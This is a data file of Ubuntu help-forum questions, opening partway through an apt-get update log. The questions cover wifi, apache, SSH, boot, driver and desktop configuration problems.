olivia/import i386 packages get:12 http : //packages.linuxmint.com olivia/upstream sources [ 4.862 b ] get:13 http : //archive.ubuntu.com raring/restricted amd64 packages hit http : //security.ubuntu.com raring-security/main amd64 packages hit http : //mirrors.liquidweb.com raring/restricted sources get:14 http : //linux-mint.froonix.org olivia/romeo i386 packages hit http : //security.ubuntu.com raring-security/restricted amd64 packages get:15 http : //packages.linuxmint.com olivia/import sources [ 485 b ] hit http : //mirrors.liquidweb.com raring/universe sources get:16 http : //archive.ubuntu.com raring/universe amd64 packages hit http : //security.ubuntu.com raring-security/universe amd64 packages get:17 http : //packages.linuxmint.com olivia/backport sources [ 20 b ] hit http : //mirrors.liquidweb.com raring/multiverse sources hit http : //security.ubuntu.com raring-security/multiverse amd64 packages hit http : //mirrors.liquidweb.com raring-updates/main sources get:18 http : //archive.ubuntu.com raring/multiverse amd64 packages hit http : //security.ubuntu.com raring-security/main i386 packages get:19 http : //packages.linuxmint.com olivia/main amd64 packages [ 23,5 kb ] hit http : //mirrors.liquidweb.com raring-updates/restricted sources hit http : //security.ubuntu.com raring-security/restricted i386 packages get:20 http : //archive.ubuntu.com raring/main i386 packages hit http : //mirrors.liquidweb.com raring-updates/universe sources hit http : //security.ubuntu.com raring-security/universe i386 packages hit http : //security.ubuntu.com raring-security/multiverse i386 packages hit http : //mirrors.liquidweb.com raring-updates/multiverse sources get:21 http : //packages.linuxmint.com olivia/upstream amd64 packages [ 9.249 b ] get:22 http : //archive.ubuntu.com raring/restricted i386 packages get:23 http : //packages.linuxmint.com olivia/import amd64 packages [ 39,2 kb ] hit http : //security.ubuntu.com raring-security/main translation-en get:24 http : //archive.ubuntu.com raring/universe i386 packages hit http : //security.ubuntu.com raring-security/multiverse translation-en get:25 http : //archive.ubuntu.com raring/multiverse i386 packages get:26 http : //packages.linuxmint.com olivia/main i386 packages [ 23,5 kb ] hit http : //security.ubuntu.com raring-security/restricted translation-en hit http : //archive.ubuntu.com raring/main translation-en hit http : //security.ubuntu.com raring-security/universe translation-en get:27 http : //packages.linuxmint.com olivia/upstream i386 packages [ 9.237 b ] hit http : //archive.ubuntu.com raring/multiverse translation-en get:28 http : //packages.linuxmint.com olivia/import i386 packages [ 40,1 kb ] ign http : //linux-mint.froonix.org olivia/import translation-en_us hit http : //archive.ubuntu.com raring/restricted translation-en ign http : //linux-mint.froonix.org olivia/import translation-en ign http : //linux-mint.froonix.org olivia/main translation-en_us ign http : //linux-mint.froonix.org olivia/main translation-en ign http : //linux-mint.froonix.org olivia/romeo translation-en_us hit http : //archive.ubuntu.com raring/universe translation-en ign http : //linux-mint.froonix.org olivia/romeo translation-en ign http : //linux-mint.froonix.org olivia/upstream translation-en_us hit http : //archive.ubuntu.com raring-updates/main amd64 packages ign http : //linux-mint.froonix.org olivia/upstream translation-en hit http : //archive.ubuntu.com raring-updates/restricted amd64 packages hit http : //archive.ubuntu.com raring-updates/universe amd64 packages hit http : //archive.ubuntu.com raring-updates/multiverse amd64 packages hit http : //archive.ubuntu.com raring-updates/main i386 packages hit http : //archive.ubuntu.com raring-updates/restricted i386 packages hit http : //archive.ubuntu.com raring-updates/universe i386 packages hit http : //archive.ubuntu.com raring-updates/multiverse i386 packages ign http : //security.ubuntu.com raring-security/main translation-en_us ign http : //security.ubuntu.com raring-security/multiverse translation-en_us hit http : //archive.ubuntu.com raring-updates/main translation-en ign http : //security.ubuntu.com raring-security/restricted translation-en_us ign http : //security.ubuntu.com raring-security/universe translation-en_us hit http : //archive.ubuntu.com raring-updates/multiverse translation-en hit http : //archive.ubuntu.com raring-updates/restricted translation-en hit http : //archive.ubuntu.com raring-updates/universe translation-en ign http : //packages.linuxmint.com olivia/import translation-en_us ign http : //packages.linuxmint.com olivia/import translation-en ign http : //packages.linuxmint.com olivia/main translation-en_us ign http : //packages.linuxmint.com olivia/main translation-en ign http : //packages.linuxmint.com olivia/upstream translation-en_us ign http : //packages.linuxmint.com olivia/upstream translation-en ign http : //archive.ubuntu.com raring/main translation-en_us ign http : //archive.ubuntu.com raring/multiverse translation-en_us ign http : //archive.ubuntu.com raring/restricted translation-en_us ign http : //archive.ubuntu.com raring/universe translation-en_us ign http : //archive.ubuntu.com raring-updates/main translation-en_us ign http : //archive.ubuntu.com raring-updates/multiverse translation-en_us ign http : //archive.ubuntu.com raring-updates/restricted translation-en_us ign http : //archive.ubuntu.com raring-updates/universe translation-en_us fetched 192 kb in 14s ( 13,1 kb/s ) w : failed to fetch gzip : /var/lib/apt/lists/partial/linux-mint.froonix.org_dists_olivia_main_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/linux-mint.froonix.org_dists_olivia_upstream_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/linux-mint.froonix.org_dists_olivia_import_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/linux-mint.froonix.org_dists_olivia_romeo_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/linux-mint.froonix.org_dists_olivia_main_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/linux-mint.froonix.org_dists_olivia_upstream_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/linux-mint.froonix.org_dists_olivia_import_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/linux-mint.froonix.org_dists_olivia_romeo_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_raring_main_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_raring_restricted_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_raring_universe_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_raring_multiverse_binary-amd64_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_raring_main_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_raring_restricted_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_raring_universe_binary-i386_packages hash sum mismatch w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_raring_multiverse_binary-i386_packages hash sum mismatch e : some index files failed to download . they have been ignored , or old ones used instead .
472978	how to create a theme with a picture panel svg or png for gnome flashback ( compiz ) , unity , gnome classic ?	how to create a theme with a picture panel svg or png for gnome flashback ( compiz ) and gnome flashback ( metacity ) and unity in ubuntu 14.04 . how to create a theme with a picture panel ( svg or png ) for unity and gnome classic in ubuntu 12.04 . i can not get gnome-panel.css unity.css and image display panel . this is easily done in gtk 2 . is it possible to gtk 3 ? give reference to exemplary themes which are correctly displayed panel with image svg or png .
472980	use ubuntu cd to boot from usb drive ?	i have a bootable cd containing ubuntu 14.04 server and a bootable usb drive containing the operating system i want to install . the problem is , my pc does not support the option to boot from usb . it does support the option to boot from cd . my question is : is it possible to boot from the ubuntu cd and somehow tell it to then boot from the usb drive ? thanks !
472981	ubuntu problems	i recently installed ubuntu 13.10 , i was running winows xp previously . my ubuntu is unable to pick up my internet and my wi-fi is not working . ubuntu is my sole operating system right now , but i really need to get rid of it . if i was to put in a windows 7 install disk , do you think i could get windows running again on my laptop ? and if so , how do i go about getting windows 7 working ?
472983	404 not found error on apache2	i have installed apache2 , actual php version , mysql server and vsftp on my new ubuntu server . i also installed wordpress and gave the user www-data all rights for /var/www/* and put it to 755 . i hooked the domain to the server with * and @ a-record . now , everytime when i open a page , it says 404 file not found on server . i do n't know how to fix this . can you help me ? edit : i think its because mod_rewrite . i installed mod_rewrite with : sudo a2enmod rewrite sudo service apache2 restart but it still does n't work .
472985	error while getting interface	i have installed the latest version of aircrack-ng , but when i run this code , sudo airmon-ng start wlan0 i get this . sudo airmon-ng start wlan0 found 4 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! -e pid name 463 avahi-daemon 475 avahi-daemon 683 networkmanager 756 wpa_supplicant interface chipset driver wlan0 broadcom wl - [ phy0 ] mon0 : error while getting interface flags : no such device ( monitor mode enabled on mon0 ) is there anyone who could help me get this problem solved please .
472991	wi-fi problem in ubuntu 14.04	my laptop ca n't be connected through wi-fi.it has no driver for that whereas in window it 's working properly.i have double os in my laptop hp pavilion n011tu . please help
472994	configuration for three display setup with two nvidia cards ?	i have two video adapters : nvidia geforce gtx 570 and a three lcd displays connected to them . here 's the topology illustrated graphically : [ gtx 570 ] === hdmi === > philips 273elh # 0 ( center/main ) [ ] ==== dvi === > dell p1913 # 2 ( right ) [ gtx 570 ] ==== dvi === > dell p1913 # 1 ( left , portrait ) and a physical layout : [ ] [ ] [ ] [ # 1 ] [ # 0 ] [ # 2 ] [ ] [ ] [ ] [ ] [ ] i 've managed to place all displays correctly by using xorg.conf , here 's my version , but i ca n't move windows between displays . they are somehow isolated from each other . i 'm using proprietary nvidia driver version 331.38 , because i 'm experiencing some rendering problems with nouveau ( especially with guake ) and as far as i understand proprietary drivers should have a better performance . i know i can use xinerama , but i 'm getting a lot of glitches and strange behavior with it ( especially in google chrome ) . is it possible to create continuous desktop space without using xinerama or to configure xinerama to work correctly without all those glitches ? thank you !
472997	ca n't ssh into server , connection refused	i ca n't ssh into my server . the server is on a private network administrated by me . ubuntu is version 14.04 . this started when i changed to a wired ethernet card . the client is mobaxterm ( latest ) on windows 7 . this is what i have done : the client can ping the server the server can ping the client i can ssh localhost on the server with no problems ufw status shows port 22 open netstat -l shows port 22 listening i did a iptable -- list but honestly i 'm not sure of what i 'm seeing . here are the lines that have ssh in them : accept tcp -- anywhere anywhere tcp dpt : ssh accept udp -- anywhere anywhere udp dpt : ssh i 'd post the whole output except that i have no good way to get it off the server . all suggestions are welcome .
472998	misconfigured compiz and lost desktop usage	i disabled something in the compiz manager , i think i disabled the opengl plugin . now nothing is showing on my desktop , i can not interact with anything and all i can see is the background wallpaper . the bars are gone , the icons . i 've tried resetting the unity , but it did not work . i reinstalled ubuntu and it also failed . what can i do now ? help me !
472999	username/password authentication failed . dpkg : error : requested operation requires superuser privilege	gichan02 @ gichan02-latitude-d520 : ~ $ wget https : //private-ppa.launchpad.net/commercial-ppa-uploaders/xojo/ubuntu/pool/mainââ/x/xojo/xojo-bin_2013.41-0ubuntu1_i386.deb ; dpkg -i xojo-bin*.deb -- 2014-05-28 00:17:18 -- https : //private-ppa.launchpad.net/commercial-ppa-uploaders/xojo/ubuntu/pool/main % e2 % 80 % 8c % e2 % 80 % 8b/x/xojo/xojo-bin_2013.41-0ubuntu1_i386.deb resolving private-ppa.launchpad.net ( private-ppa.launchpad.net ) ... 91.189.95.83 connecting to private-ppa.launchpad.net ( private-ppa.launchpad.net ) |91.189.95.83|:443 ... connected . http request sent , awaiting response ... 401 authorization required username/password authentication failed . -- 2014-05-28 00:17:20 -- https : //private-ppa.launchpad.net/commercial-ppa-uploaders/xojo/ubuntu/pool/main % e2 % 80 % 8c % e2 % 80 % 8b/x/xojo/xojo-bin_2013.41-0ubuntu1_i386.deb reusing existing connection to private-ppa.launchpad.net:443 . http request sent , awaiting response ... 401 authorization required username/password authentication failed . dpkg : error : requested operation requires superuser privilege
473002	bash script help	the -- print-uris in apt will print the entire output along with the urls to a specified txt file . i need a command which will only select the packges to be installed from the output of print uris and redirect them to a file . as you might have guessed i m trying to create a script . thanks in advance
473003	problem with apache2 ... pid file do not match	i was having a problem with this and than i do the following command : kill -9 $ ( ps -e | grep apache2 | awk ' { print $ 1 } ' ) to kill the proccess and return of apache2.pid was 999 ... now i have other problem ... i have another error : the apache2 configtest failed . output of config test was : ah00526 : syntax error on line 110 of /etc/apache2/apache2.conf : user takes one argument , effective user id for this server action 'configtest ' failed . the apache error log may have more information . it shows error on line user $ { apache_run_user } can somebody help me one this ? thanks in advance . this is the error.log with todays date : [ tue may 27 06:18:49.128719 2014 ] [ mpm_prefork : notice ] [ pid 1004 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ tue may 27 06:18:49.149709 2014 ] [ core : notice ] [ pid 1004 ] ah00094 : command line : '/usr/sbin/apache2' [ tue may 27 09:54:36.813001 2014 ] [ mpm_prefork : notice ] [ pid 1004 ] ah00169 : caught sigterm , shutting down [ tue may 27 09:55:40.057275 2014 ] [ mpm_prefork : notice ] [ pid 1424 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ tue may 27 09:55:40.076713 2014 ] [ core : notice ] [ pid 1424 ] ah00094 : command line : '/usr/sbin/apache2' [ tue may 27 16:38:41.922484 2014 ] [ mpm_prefork : notice ] [ pid 1424 ] ah00169 : caught sigterm , shutting down [ tue may 27 16:39:24.746572 2014 ] [ mpm_prefork : notice ] [ pid 999 ] ah00163 : apache/2.4.7 ( ubuntu ) php/5.5.9-1ubuntu4 configured -- resuming normal operations [ tue may 27 16:39:24.766023 2014 ] [ core : notice ] [ pid 999 ] ah00094 : command line : '/usr/sbin/apache2'
473005	how to install unity web player on ubuntu 14.04 ?	i want to know how to install unity web player for ubuntu 14.04 lts 64-bit version as i am not able to access many of the online apps and they recommend me to download unity web player . can i get a simple procedure to download it ?
473008	my laptop wo n't start after installing ati driver 12.04	my laptop wo n't start or turn on any more after installing ati driver using that documentation https : //help.ubuntu.com/community/binarydriverhowto/amd after doing that step sudo apt-get remove -- purge fglrx-updates fglrx-amdcccle-updates i rebooted and then blank , even screen off i tried swapping 4x2gb ram even removing hard disk but found no solution . help me please i have only one thing in my life which is my laptop now seem to be dead .
473010	winxp display driver incorrect to boot iso ubuntu 12.04	i have windows xp on a hp pavilion w/amd athlon 64 processor 3300+ . i have downloaded ubuntu 12.04 iso desktop . when trying to run ubuntu , i get a line that says `` sis 630 buss not detected . it continues and makes a blue screen , then says low graphics mode only and has a white screen . the hp has display adaptor sis 760 , driver= 6.14.10.3671 , 4/20/2005 . i 'm not familiar with ubuntu because i 've never got it started as yet . can the ubuntu install process be changed to accept my sis 760 driver ? i 'm trying to make a live cd ( dvd ) to run ubuntu .
473011	multiboot whit full encrypted disk	hi guys , i need a ubuntu over a full encrypted disk . but i have a dualboot this are my logical partitions /dev/sda1 : label= '' windows '' uuid= '' 5a622ba23b618c35 '' type= '' ntfs '' /dev/sda5 : uuid= '' 8be90c28-295c-4032-a9aa-e197dd46e3bf '' type= '' ext4 '' /dev/sda6 : uuid= '' 7f972fb6-c22b-4619-b78c-16bba9d4ba4e '' type= '' ext4 '' the question is if i add a new fisical disk /dev/sdb like in the msata i will be able to do it ? its going to be more like booting like other fisic unit like usb or cd ? ? tnx very much .
473016	problem upgrading to 14.04 from 13.10 . screen turns on and off	i am in the cleaning up part of the process of upgrading from 13.10 to 14.04 . the installer indicated me in a window to close open apps , after i did that window was gone , no ok button to click . the system is now for more than 12 hours switching between monitor on and off . it does not look like it is advancing with the install . what should i do ?
473018	ati radeon hd 6370m , driver ubuntu 14.04 x64	can you please tell me the proper way to install my video card in ubuntu 14.04 , if it is possible ? i am using switchable graphics . in 13.10 i managed to install it , but i lost the the demo . thanks in advance .
473019	ubuntu 14.04 running slow	i have a hp workstation xw 4000 , that previously ran windows xp , i recently installed ubuntu 14.04. it now lags and the screen glitches . the machines processor is an intel pentium ( r ) 4 cpu 2.53ghz with 38.7 gb . any suggestions on how to fix this ?
473023	is there a way to work with files without leaving any trace of them ? no showing up in recent lists in editors for example	i need to work with some files without leaving any long term trace of their existence - within reason . i do n't care particularly if they could be pulled off the drive with recovery software , although preferably they would not be able to be . is there any way i can do this ? on windows i would work with them in sandboxie and simply delete the sandbox after i 've finished , but i can not find a linux equivalent . is there any way to do this ? thanks .
473026	unable to run make during installation of kernel 3.3.6	desktop : ~/desktop/linux-3.3.6 $ make xconfig make [ 1 ] : warning : file `scripts/kconfig/.zconf.tab.o.cmd ' has modification time 1.7e+04 s in the future check qt * unable to find the qt4 tool qmake . trying to use qt3 * * unable to find any qt installation . please make sure that * the qt4 or qt3 development package is correctly installed and * either qmake can be found or install pkg-config or set * the qtdir environment variable to the correct location . * make [ 1 ] : *** no rule to make target `scripts/kconfig/.tmp_qtcheck ' , needed by `scripts/kconfig/qconf.o ' . stop . make : *** [ xconfig ] error 2 when i tried to install qt4-qmake through synaptic manager ; an error is displayed saying that tz_data not found .
473028	synchronize time in ubuntu desktop	i have windows 7 and ubuntu 14.04 on my laptop . each time when i log into windows i find that time is invalid . when set it ubuntu time crashed . what do to fix it ?
473031	automatically update linked images in presentation mode in impress ?	how do i automatically update image links while in full-screen presentation mode ? ( think of a display that has to show an updating traffic map or something )
473033	os x no longer visible in refind boot after installing ubuntu	i installed refind to esp on my macbook pro retina running mavericks ( with filevault on ) . here is my partition info : /dev/disk0 # : type name size identifier 0 : guid_partition_scheme *500.3 gb disk0 1 : efi efi 209.7 mb disk0s1 2 : apple_corestorage 199.5 gb disk0s2 3 : apple_boot recovery hd 650.0 mb disk0s7 4 : apple_hfs work 200.0 gb disk0s5 5 : 0fc63daf-8483-4772-8e79-3d69d8477de4 99.7 gb disk0s6 /dev/disk1 # : type name size identifier 0 : apple_hfs mac *199.1 gb disk1 disk0s6 is my ubuntu partition . with this setup , it boots from efi properly , but only ubuntu ( 14.04 , upgraded ) is shown as an option in the refind boot screen . there is no trace of my os x disk and the only way i can boot into it is by selecting the disk from an option-boot screen . how do i fix this so that both my os x and ubuntu are displayed ?
473036	is it possible to adjust console text size with framebuffer disabled ?	i 've just built an ubuntu 14.04 based home server and i 'm running it `` headless '' in that i normally connect to it over ssh . the server is based on a miniitx board and has onboard vga video which was detected by the server installer . occasionally ( e.g . after a kernel upgrade ) i like to watch it boot so i can capture any error messages . for convenience i 've got it plugged into the vga port on my 22 '' lcd ( native resolution 1920 x 1200 ) . there are two discreet stages to booting after the grub screen closes . the first has ( i think that 's when initrd is doing its stuff ) has the classic text-mode console font and fills the screen without much line wrapping . the second ( where the kernel is running init ) has a nicer font but fills only about 1/2 the screen width and 2/3 the height . every line wraps after the first square bracket of [ ok ] what i 'd like is is to get the same console font throughout the boot process and have the output readable in the event that the system hangs on boot . have tried setting grub_terminal=console and also various options under # grub_gfxmode=1600x1200 # grub_gfxpayload_linux=1920x1200 all attempts so far have resulted in the initial boot screens displaying much larger ( so that one line of text occupies 3 or 4 lines on the screen , and none of them have resulted in the console screen filling the entire monitor . vbeinfo gives me a load of options ( e.g . 0x160 to 0x171 ) which are defined as text only ) but i 've been unable to find out what these actually mean . should i be working through the 0x1nn options , or is there something i 've missed ? i did run update-grub after every config change .
473037	how to permanently disable sleep/suspend ?	subtly broken is worse than frankly broken ... background : i already disabled suspend in system settings - > power . the `` suspend '' option still appears on the gear menu ( not that i expected it to disappear ) , and the sleep ( moon ) button on my keyboard still triggers suspend . the options in # 1 are , as others have pointed out , just too easy to hit by mistake once every month or so . it seems like 1 % of platforms get suspend right , because some driver engineer somewhere forgot to check that pcie or io space register x gets restored when upon wake . so it 's worse than broken : everything usually looks fine after waking up , only it 's not . and hopefully none of those corrupted registers affects reliability in a creeping manner , like ecc configuration or storage fifo depth . but they usually do , in one form or another , which is one reason , for example , why errata against graphics drivers continue infinitely , years after they debut on the market ( `` graphics chip x hangs an hour after resuming from suspend blah blah blah '' ) . there should be an automated test to see what registers change across a sleep cycle , but few vendors have such a test . the test is complicated somewhat by the fact that some registers are expected to change , such as timers . and worse , sometimes you have to read registers in a certain order or with a particular granularity , or by first writing a read index somewhere else . so this process can not be centralized at a convenient place in the industry , like canonical 's offices . it 's really and truly hopeless unless pcie is redefined in such a manner that makes comparison easy , which it wo n't be . the magical test suite in # 5 will never be written because of the chaotic state of driver development . hence in the absence of that , my question . i 'm so desperate that i do n't mind hacking on /etc/whatever_suspend_file , but it would be nice if there were a `` polite '' way to do this , like that nonexistent checkbox in system settings - > power that says `` permanently disable suspend because it was ill-conceived from day one . '' nb : i 'm not talking about hibernation here , which should n't suffer from the problems above because it involves a power cycle . although in principle , restoring registers from permanent storage could have similar problems .
473047	ubuntu upgrade fails due to missing packages . ( forbidden )	i am trying to upgrade my 13.10 os to the new 14.04 version . this fails due to missing packages . i tried multiple times . is the pnl mirror borked ? failed to fetch http : //mirror.pnl.gov/ubuntu/pool/main/libl/liblog-message-simple-perl/liblog-message-simple-perl_0.10-1_all.deb 403 forbidden failed to fetch http : //mirror.pnl.gov/ubuntu/pool/main/libp/libpod-latex-perl/libpod-latex-perl_0.61-1_all.deb 403 forbidden failed to fetch http : //mirror.pnl.gov/ubuntu/pool/main/libt/libterm-ui-perl/libterm-ui-perl_0.42-1_all.deb 403 forbidden
473049	logitech g27 steering wheel - feedback not working properly	i am using ubuntu 12.04 64bit lts and am trying to use a logitech g27 steering wheel and pedals . everything but the steering feedback is working fine . i can test the feedback with fftest : ( note the line `` axes query '' is empty ) $ fftest /dev/input/event11 force feedback test program . hold firmly your wheel or joystick to prevent damages device /dev/input/event11 opened axes query : effects : constant number of simultaneous effects : 16 upload effects [ 0 ] : invalid argument upload effects [ 2 ] : invalid argument upload effects [ 3 ] : invalid argument upload effects [ 4 ] : invalid argument upload effects [ 5 ] : invalid argument enter effect number , -1 to exit 1 now playing : constant force but the feedback is very weak and it does not work with ffcfstress or my target application . $ ffcfstress -d /dev/input/event11 -o error : device ( or driver ) has no force feedback support [ ffcfstress.c:166 ] $ i hope you can help me with this problem . thanks . update i tried with ubuntu 14.04 and i can use ffcfstress to use force feedback . unfortunately we 'd like to stay with ubuntu 12.04 since all this is running on a cluster machine with many people working on it . it also works on osx with supertuxkart ( i know , a professional way to try it out . )
473050	ftp in xammp or vsftpd	i just know xampp can provide web , sql and ftp services on the server . also i know vsftpd gives ftp service . so which one to choose if some one wants to give his server ftp service ? which one do you advise ? are they have any different which make one of them better than another way ?
473052	sound is not working in ubuntu 14.04 via headphones	i tried everything that i could to get it back , since i am very new to linux i could n't help myself . when i am trying to connect external microphone it seems that system detects it but connecting headphone does n't showing in connected . when i am selecting hdmi in following sound setting dialogue , it is not playing sound through headphones and even worse is , it is somehow making my youtube videos playing in fast forward mode . please someone help me ! ! ! thanks in advance ... ... ... ... .
473053	how to take ownership of a ppa ?	say there 's a software that was n't created for ubuntu but someone creatred a ppa for it and i use that ppa . now the ppa owner , does n't want to maintain the ppa anymore . can i ask the owner to hand it over , so that i maintain the ppa ? if so how ? and what does maintaining the ppa require besides updating the code ?
473057	need advice for programming languages for a custom gui	i just transitioned from windows to ubuntu and so far loving it . on my list of tasks is to develop a gui interface for collecting data from a remote device through rs232 , compile and display the results . currently my plans are to make a simple logic analyzer to display waveforms and a customized data logger for displaying text data as well as a graphing the results . i have experience on the embedded side with c/c++ , assembler and some java , plus good old basic . but unfortunately the pc side is total new to me and iâm getting overwhelmed with my research . my questions are : 1 ) what is the native ( loosely used ) language for linux for api development ? 2 ) what is the best way to collect and buffer data from a rs232 device ?
473061	how do i read values from csv into a script ?	i want to write a script that reads a url from a .csv file , gets the whois data , then goes to the next url in the list . # ! /bin/bash whois $ url & > `` $ url.txt '' how do i get the $ url , and run it for as long as there is data to compare it to ?
473066	need help installing ubuntu 14.04 onto a win8 notebook	i have a samsung series 7 ultrabook . i like it a lot , however i absolutely can not stand windows 8 . sure a touch screen interface is cool , but it just is n't organized well for me and i ca n't even use the touchscreen to zoom in on things ! most gestures only work on a select few programs ! it 's only good for scrolling up and down , but why get fingerprints on the screen when i can just scroll with the touch pad ? i do n't have any need for a win8 notebook as all my main work is done on my win7 desktop that is much faster than my notebook . i also feel that my notebook 's performance would be better on ubuntu than on 8 ? ( correct me if i am wrong ) . my notebook is fast , but sometimes i feel the os really hinders its performance , and for what i am doing on it ( surfing the web , watching videos , etc . ) , i see no reason why ubuntu is n't the better choice . i would like to format the hdd completely and install ubuntu on it . i have an installation cd , however when i turn my notebook on and i choose to run ubuntu i get this message : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : insert your windows installation disc and restart your computer . choose your language settings , and then click `` next . '' click `` repair your computer . '' if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : the application or operating system could n't be loaded because a required file is missing or contains error . i have done a small amount of research online and it seems microsoft does n't want open-source os 's installed to their newer units , which in some ways is understandable i suppose . can anyone walk me through how i should go about installing ubuntu to my notebook ? also , should i expect issues installing drivers for my keyboard , touchpad , touchscreen , etc. ? it would seriously be awesome if i could have this notebook running only ubuntu 14.04 with full support for my touch screen and all that . one other thing i feel i should add is that my notebook does not have a cd drive but i do have an lg drive i have been using with it . thanks you all for your time !
473067	how to set shutter as default screenshoter in ubuntu 14.04	i 'm using standard ubuntu 14.04 with unity , how come i can not set shutter as default screenshoter anymore ? i tried everything i knew , i purged it and reinstalled it completely , set it in compiz settings manager shutter -f and shutter -a ticked the gnome compatibility plugin , even rebooted the system completely still it does n't react when i press printscreen instead basic screenshoter takes a screenshot . is there something else has changed with compatibility ?
473068	why does terminal auto complete sometimes not suggest anything for the `services` command ?	sometimes , when i type a command on the terminal , the terminal 's autocomplete does not work , even if my command is not wrong . for example , take look to this : sudo service vsftpd status sudo and service do not have any problem . i mean , when you type sud +tab terminal suggest you sudo or i type servi + tab terminal complete that to service . but for vsftpd i do not get any suggestion . is there a way to say , `` terminal , please tell me any suggestion ! ! ? `` .
473070	nothing appears on the menu bar in ubuntu 14.04	i recently installed ubuntu 14.04 . this was my first ubuntu installation . the unity launcher and menu bar did not appear at first but i fixed it by searching from the internet . now , the menu bar appears but is empty . only the title of the active window appears and nothing else . the power button , the clock , mail , sound , nothing appears . i tried resetting and reinstalling unity . i tried killall unity-panel-services but it says `` no process found '' .
473071	reasign super key ubuntu minimal gnome 3	how can i reassign the super key in ubuntu with gnome3 ? hello . i installed , today , ubuntu minimal . further i 've installed gdm , gnome-shell , firefox , gnome-terminal , gno-menu , gnome-tweak-tool and gnome-do . i 've also installed ccsm . i would like to rebind or disable the super key . i 've been looking for a working solution for over an hour now without a functioning ( not outdated ) solution . i would like to rebind it to gno-menu . i 've tried to bind through gnome tweak tool with no success same for ccsm . i 've also tried binding directly from the gno-menu 's preferences but it allow only for a string ( code ) input rather than a key recognition and therefore i have no idea of what even to enter , but believe that i 've tried tons of combinations .
473078	must i install ubuntu to use it fully ?	what is the difference between running ubuntu on a live usb and on internal hard drive ?
473079	always show menu in libreoffice	i 'd like to always see the application menu , but by default that 's hidden until i mouse onto the top line of the screen . perhaps this is aesthetically pleasing , but it sucks in terms of usability . i saw this old question about the same problem but the solutions there must be outdated . at least they do n't work on my 14.04 system . the purge-and-reinstall trick did n't work for me , it 's the same as before . how can i make the libreoffice application menu always be visible ?
473080	run script in /etc/rc.local under specific user	i am using portia ( https : //github.com/scrapinghub/portia ) and i have set the following command in my rc.local : cd /home/portia/portia/slyd & & twistd slyd problem here is that the command/script get executed as root and all the files/folders that are created by the script have `` root '' as owner . how can i run this specific command as a different user ? what i have tried so far : cd /home/portia/portia/slyd & & su jim -c twistd slyd cd /home/portia/portia/slyd & & su jim -c `` twistd slyd '' su jim -c `` cd /home/portia/portia/slyd & & twistd slyd '' nothing worked . i am running ubuntu 12.04 lts server . thank you !
473082	warning : terminal is not fully functional despite xterm-color	i have two ubuntu vms . on one of them , whenever i run git diff or git log , i see : warning : terminal is not fully functional i then get a horrible , monocolour diff ( yech ) . how do i fix this ? i already tried : setting term to xterm-color , ansi , and yes , even msys ( all to no avail ) restarting my machine checking that term is set to something sane ( xterm by default ) i ended up editing ~/.bashrc to set term to xterm-color , which makes my terminal prompts look moar awesome , but does n't solve this one problem with git .
473083	windows 8.1 blocking ubuntu 's access to my hdd	so i was trying to install ubuntu 14.04 on a new ideapad that comes with win8.1 and the moment i start the setup i see that the hdd is inaccessible , neither from the install app or from nautilus . the computer knows the partitions ( recovery and win ) are there , but ca n't mount/access either . even if i went and made a separate partition from win to format to ext and install ubuntu there there 's the problem of accessing files in the win partition when i 'm in ubuntu , something which i can barely do on the other hand because win has no native ext compatibility and the alternatives force me to copy one file from a partition to the other which in a laptop i simply do n't have space for . another weird situation is that a usb hdd i was using to move files from another laptop is now blocked by win too , which allows me to see the files and copy from the hdd , but not to move files to the hdd . do n't know if its connected but it is a rare occurrence .
473087	downgrade to gcc < v3.0	for specific reasons i have to downgrade my gcc to version 2.x using apt-get ( not downloading and compiling the source ) is that possible ? if yes , how can i find the repository address and install it via apt-get ? thanks in advance .
473089	ubuntu 14.04 system details only showing one core	hello first up sorry for bad english , i am from holland . i got a nice free pc with a intel® pentium ( r ) d cpu 2.80ghz × 2 but on system details it shows only showing one core my q. how come ? ? ?
